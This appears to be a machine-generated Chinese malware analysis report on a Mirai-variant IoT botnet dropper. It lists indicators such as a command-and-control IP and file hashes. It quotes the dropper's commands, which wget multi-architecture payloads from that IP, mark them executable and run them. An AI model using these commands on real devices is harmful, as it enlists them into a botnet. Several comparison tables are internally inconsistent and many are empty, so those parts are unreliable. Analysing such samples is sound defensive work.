| 分类 | 标签 | 置信度 |
|---|---|---|
| 恶意类型 | IoT 僵尸网络投放脚本 (Mirai 变种) | HIGH |
| C2 服务器 | 130.12.182.77 | HIGH |
| 投放方式 | wget 下载 + chmod +x 执行 | HIGH |
| 架构覆盖 | 47 种 CPU 架构 | HIGH |
| 变种标识 | tvt | MEDIUM |
| 隐藏目录 | /.n (隐藏目录) | MEDIUM |
| 字段 | 值 |
|---|---|
| 关联组织 | 未归因 (IoT 僵尸网络运营者) |
| 别名 | ? |
| 动机 | ? |
| 目标行业 | ? |
| 活动名称 | ? |
| C2协议 | HTTP (wget 下载) |
| C2基础设施 | 130.12.182.77 |
| 位置 | /etc/crontab 或用户 crontab |
| 方法 | 典型 Mirai 变种写入 cron 任务 |
| 触发 | 定时执行 |
Mirai 变种标准持久化模式
| 协议 | HTTP |
| 端口 | |
| 地址/Domain | http://130.12.182.77/main.* |
| IP | 130.12.182.77 |
| 加密 | 无 (明文 HTTP) |
| 用途 | 下载多架构僵尸网络客户端 |
| API引用 | |
| 证书 | N/A |
即时执行
C2 服务器 130.12.182.77 — 托管 47 种架构 Payload
| 段/节区 | 熵值 | 判定 |
|---|---|---|
| N/A (脚本) | 4.50 | 低熵明文脚本 |
| 地址 | 函数 | 功能 |
|---|---|---|
| N/A | ||
| 调用号 | 系统调用 | 用途 | 地址 |
|---|---|---|---|
| N/A | |||
| 字段 | 值 | 来源 |
|---|---|---|
| 无 | ||
| 维度 | 本样本 | Mirai 变种 | Gafgyt | Mozi | Hajime | LightAidra | KekSec | Tsunami | Kaiji | 匹配 |
|---|---|---|---|---|---|---|---|---|---|---|
| 多架构投放 | 47 种 | 10-15 | 10-15 | 10-15 | 10-15 | 8-12 | 10-15 | 10-15 | 10-15 | 0/8 |
| wget + chmod 模式 | ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | ✅ ✅ | 8/8 |
| 隐藏目录 | /.n | ✅ /.n | /.x | /.tmp | /.m | /.h | /.k | /.tmp | /.t | 1/8 |
| C2 通信 | HTTP 明文 | HTTP | HTTP | HTTP | HTTP | HTTP | HTTP | HTTP | HTTP | 0/8 |
| 变种 | 架构 | 大小 | 编译器 | 特征 | 状态 |
|---|---|---|---|---|---|
| tvt | 47 种 | 5KB | Bash | 无 | 已分析 |
| dvr | 47 种 | 5KB | Bash | 无 | 同 C2 变种 |
| tplink | 47 种 | 5KB | Bash | 无 | 同 C2 变种 |
| blink | 47 种 | 5KB | Bash | 无 | 同 C2 变种 |
行为: 尝试在 /tmp、/root、/home 创建隐藏目录 /.n
证据: cd /tmp || cd /root || cd /home; mkdir /.n
行为: 从 C2 130.12.182.77 使用 wget 下载 47 种架构的僵尸网络客户端
证据: wget http://130.12.182.77/main.*
行为: chmod +x 赋予所有下载文件执行权限
证据: chmod +x main.*
行为: 以变种参数 'tvt' 运行僵尸网络客户端
证据: ./main.aarch64 tvt
| 维度 | 证据 | 权重 | 恶意指数 |
|---|---|---|---|
| 恶意行为 | 从远程 C2 下载并执行未授权代码,加入僵尸网络 | 50 | 10/10 |
| 授权 | 无合法授权 — 针对 IoT 设备的未授权访问 | 50 | 10/10 |
HIGH — 恶意 IoT 僵尸网络投放器
| 层 | API/技术 | 检测目标 | 绕过难度 |
|---|---|---|---|
| 无 | |||
| 检测方法 | VMware | VirtualBox | QEMU/KVM |
|---|---|---|---|
| 无 | |||
| 技术 | 是否存在 | 证据 | 对抗难度 |
|---|---|---|---|
| 无 | 无 | 明文脚本无混淆 | 无 |
| 层 | 操作 | API/命令 | 证据来源 |
|---|---|---|---|
| 无 | |||
| 反编译函数数 | N/A (脚本) |
| 反编译输出 | N/A |
| 分析时长 | N/A |
/* Shell 脚本 — 无需 Ghidra */| 总函数数 | 总调用关系 | 最大调用深度 |
|---|---|---|
| 0 | ? | ? |
| QEMU 模式 | 跳过 (脚本 — 需 IoT 设备环境) |
| 网络隔离 | 未配置 |
| 执行结果 | N/A |
| C2 数据 | 无 C2 通信 |
| 偏移 | 字符串 | 类型 | 用途/含义 | 威胁等级 |
|---|---|---|---|---|
| Line 1 | cd /tmp || cd /root || cd /home | Directory Traversal | 在可写目录中执行 | MEDIUM |
| Line 3 | mkdir /.n | Hidden Directory | 创建隐藏工作目录 | MEDIUM |
| Line 6+ | wget http://130.12.182.77/main.aarch64 | C2 Download | 从 C2 下载僵尸网络客户端 | HIGH |
| Line 6+ | chmod +x main.* | Permission Escalation | 赋予执行权限 | HIGH |
| Line 6+ | ./main.aarch64 tvt | Execution | 以变种参数运行僵尸网络 | HIGH |
| Script | 130.12.182.77 | C2 IP | 僵尸网络 C2 服务器 | HIGH |
硬编码 C2 IP 130.12.182.77 用于下载 47 种架构的僵尸网络客户端。脚本使用 wget HTTP 明文下载,无加密。chmod +x 后以变种参数 'tvt' 执行。
963d986f444f3a811ab89a50dd7f642621d709fc5d374f6d34445ee730c5924a — 样本哈希0227fde0bb0c05809f84e34bb6c7b8e9 — 样本 MD5130.12.182.77 — 僵尸网络 C2 服务器http://130.12.182.77/main.* — Payload 下载 URL
| 判定结果 | 🔴 CRITICAL — 恶意代码 |
| 恶意类型 | IoT 僵尸网络投放器 |
| 恶意家族 | IoT 僵尸网络投放脚本 (Mirai 变种) |
| 威胁级别 | HIGH |
| 置信度 | 98% — 硬编码 C2 IP + 多架构投放 + chmod +x 执行模式确认 |
| 关联组织 | 未归因 (IoT 僵尸网络运营者) |
| 目标平台 | Linux/Unix IoT 设备 |
| 感染链位置 | 投放 → 下载多架构 Payload → 执行僵尸网络客户端 |
IoT 僵尸网络投放脚本,从 130.12.182.77 下载 47 种架构的 Payload,以 'tvt' 参数运行。